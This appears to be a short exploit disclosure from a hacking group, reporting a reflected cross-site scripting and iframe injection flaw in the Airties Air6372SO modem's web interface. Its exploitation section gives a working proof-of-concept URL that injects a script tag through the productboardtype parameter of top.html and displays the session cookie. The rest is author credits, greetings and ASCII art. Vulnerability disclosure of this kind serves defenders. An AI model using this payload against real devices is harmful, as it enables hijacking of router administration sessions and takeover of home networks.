Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x, Unuttuklarmz affola..
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : Air6372SO
|~Official Web: http://www.airties.com
|~RISK : Light
|~Tested On : Kali Linux \ Windows XP \ Windows Vista \ Airties Air6372SO Modem Web Interface
####################INFO################################
interface can be easily operated without root login.
Exploitation;
==============================================================================
http://$MODEMROOT/top.html?productboardtype= ?
http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script>
==============================================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/